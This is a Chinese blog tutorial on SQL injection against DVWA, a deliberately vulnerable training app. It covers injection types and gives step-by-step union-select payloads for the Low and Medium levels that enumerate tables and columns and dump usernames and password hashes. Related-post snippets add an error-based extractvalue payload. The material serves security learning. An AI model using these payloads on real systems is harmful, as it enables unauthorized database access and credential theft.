DVWA中SQL注入

最新推荐文章于 2024-06-09 10:49:06 发布
最新推荐文章于 2024-06-09 10:49:06 发布
阅读量3k 收藏 21
点赞数 4
文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40482449/article/details/109294710
版权
一、SQL注入原理

原理:攻击者通过Web应用程序利用SQL语句或字符串将非法的数据插入到服务器端数据库中,获取数据库的管理用户权限,然后将数据库管理用户权限提升至操作系统管理用户权限,控制服务器操作系统,获取重要信息或机密文件。

二、SQL注入分类
1、按照数据提交方式分类

(1)GET 注入
(2)POST 注入
(3)Cookie 注入
(4)HTTP 头部注入

2、按照注入点分类

(1)数字型注入点
(2)字符型注入点
(3)搜索型注入点

3、按照执行效果分类

(1)基于布尔的盲注
(2)基于时间的盲注
(3)基于报错的注入
(4)联合查询注入
(5)堆叠注入
(6)宽字节注入

三、SQL注入流程

(1)判断是否存在注入,是数字型还是字符型
(2)猜解SQL查询语句中的字段数
(3)确定显示位置
(4)获取当前数据库
(5)获取数据库中的表
(6)获取表中的字段名
(7)下载数据

四、DVWA中SQL Injection
1、Low级别

在这里插入图片描述

1)判断注入类型(字符型)
1' and '1'='1
1' and '1'='22)猜解SQL查询语句中的字段数
1' order by 1 #
1' order by 2 #3)确定显示位置
1' union select 1,2 #
(4)获取当前数据库及数据库版本
1' union select database(),version() #5)获取数据库中的表
1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa' #
(6)获取表中的字段名
1' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #7)查询用户名和密码
1' union select group_concat(user),group_concat(password) from users #
2、Medium级别

(1)页面无法输入SQL语句,使用burp suite抓包分析;
在这里插入图片描述
(2)使用burp suite抓包,将数据放到Repeater中尝试注入
在这里插入图片描述
在这里插入图片描述

1)判断注入类型(数字型)
1 and 1=1
1 and 1=22)猜解SQL查询语句中的字段数
1 order by 1 
1 order by 23)确定显示位置
1 union select 1,24)获取当前数据库及数据库版本
1 union select database(),version()5)获取数据库中的表
1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()6)获取表中的字段名(将users转化为hex,数据库可以识别)
1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x75736572737)查询用户名和密码
1 union select group_concat(user),group_concat(password) from users
3、High级别

字符型注入,和低级别类似

4、Impossible级别

在这里插入图片描述

随风6034
关注
  • 4
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
DVWA-SQL注入
WY92139010的博客
05-03 946
DVWA-SQL注入 一、SQL注入概念 SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。 二、手工注入常规思路 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句的字段数 3.确定回显位置 4.获取当前数据库 5.获取数据库的表 6.获取表的字段名 7.得到数据 三、DVWA注入分...
DVWA——SQL注入
m0_74426634的博客
04-07 1007
日前,国内最大的程序员社区CSDN网站的用户数据库被黑客公开发布,600万用户的登录名及密码被公开泄露,随后又有多家网站的用户密码被流传于网络,连日来引发众多网民对自己账号、密码等互联网信息被盗取的普遍担忧。网络安全成为了现在互联网的焦点,这也恰恰触动了每一位用户的神经,由于设计的漏洞导致了不可收拾的恶果,验证了一句话“出来混的,迟早是要还的”,所以介绍一些常用的攻击技术和防范策略。SQL Injection也许很多人都知道或者使用过,如果没有了解或完全没有听过也没有关系,因为接下来我们将介绍SQL Inj
dvwa SQl注入中级、高级(使用sqlmap渗透)
最新发布
m0_72904009的博客
06-09 694
dvwa SQl注入中级、高级(使用sqlmap渗透)
DVWA-SQL注入(全级别)
小纯的博客
02-08 6343
一、SQL注入概念 SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 二、手工注入常规思路 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句的字段数 3.确定回显位置 4.获取当前数据库 5.获取数据库的表 6.获取表的字段名 7.得到数据 ...
DVWAsql注入——联合注入和报错注入
Williamanddog的博客
12-20 1858
构造payload:1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='dvwa' and table_name='users' limit 0,1)))#使用格式:updatexml(xml_document,xpath_string,new_value),作用是将document的符合string 的字符串替换为value的值。
DVWA-WEB漏洞系列之SQL注入
woo233的博客
08-09 3342
用户输入数据为 1’ and 1=1#,这时SQL语句发生变化,在原有查询完成后会判断 1=1,如果判断正确则才会有输出[#作用是注释(移除)后续SQL语句]在用户输入依次增加order by后面的数据,当在输入为 1’ order by 3#时网页出现报错,证明该数据库有2列/字段。攻击者在HTTP请求注入恶意的SQL代码,服务器使用参数构建数据库SQL命令时,恶意SQL被一起构造,并在数据库执行。防御SQL注入:使用PDO,配合正确的过滤和sql语句就可避免SQL注入漏洞的产生。...
DVWA下的SQL注入
07-25
SQL
DVWA——SQL盲注(全等级)
@一只躺平的猪@的博客
07-13 5519
SQL盲注与一般注入的区别在于:一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知。一般有两种方式:布尔型和时间型。还有一种是报错注入,本章主要介绍布尔盲注。布尔型是根据页面是否正确显示来判断我们构造的语句是否正确执行时间型则是根据页面加载时间是否变化来判断的。SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(
DVWASQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入(low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
适合DVWA和SQL-li-lab的PHPStudy、DVWA、SQL-li-labs
03-26
接着是DVWA,这个应用设计有多个安全漏洞,包括跨站脚本(XSS)、文件包含漏洞、SQL注入等,用于模拟真实世界的网络安全问题。通过DVWA,开发者或安全研究人员可以实践如何发现这些漏洞,并学习如何修复它们。每个...
sql注入渗透测试工具:sqlol/DVWA
04-24
sql注入渗透测试工具:sqlol/DVWA https://xianjie0318.blog.csdn.net/article/details/112987555?spm=1001.2014.3001.5502
利用漏洞注入之SQL注入
11-10
SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意的SQL代码来操纵或获取数据库的敏感信息。在本章,我们将深入理解SQL注入的工作原理,并通过实例学习如何利用和防范这种攻击。 首先,我们来看6.1...
dvwa系列-sql注入
一个安全研究员
05-23 2225
前言 本篇博文就不详细讲解sql注入的成因了,有兴趣的就去看看我sqlilabs的博文吧,我后面会慢慢完成sqlilabs的博文 low 我们先来判断注入点吧,用最常规的单引号试一试,报错了,初步判断应该是字符型的单引号注入。 下面就推断一下后台执行的sql语句,因为这是一个根据输入的id来查找信息的地方嘛,后台sql大概是: select id,firstname,surname ...
DVWASQL注入
m0_67392182的博客
09-11 775
深知大多数初中级Java工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则近万的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《Java开发全套学习资料》送给大家,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
dvwa——sql注入
GZY0601的博客
09-16 597
Hello!转眼一看距离我上次发文章都是一年前的事情了,职的第三年都一直备赛的路上,一次比了三个项目,搞得学的好乱,现在上了大学,开始回来复习安全的东西,说实话好久没练了很多基本的东西都忘记了,去年就一直说要写dvwa的教程,现在刚好算是可以边复习边更新。哈哈哈哈哈哈!SQL注入是一种常见的网络安全漏洞和攻击方式,它利用应用程序对用户输入数据的处理不当,使得攻击者能够在执行SQL查询时插入恶意的SQL代码。通过成功注入恶意代码,攻击者可以执行未经授权的数据库操作,获取敏感信息、篡改数据甚至完全破坏数据库。
DVWA盲注详解
qq_45788625的博客
04-18 6574
low等级DVWA盲注详解
DVWASQL注入的思路
底层社会中的弱智
06-21 596
笔记 如何把两个没有关系的表结合起来 union联合查询 前面的查询字段数量要和后面的数量相同 select user,pass from mysql.user union select user from word.wp_user; 这里只有一个,使用数字充当字段 select user,pass...
利用python语言编写一个判别DVWASQL注入题目有没有注入点
07-13
当检测DVWASQL注入漏洞时,可以使用Python编写一个脚本来判断是否存在注入点。以下是一个简单的示例: ```python import requests def check_sqli_vulnerability(url): payload = "'" response = requests....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值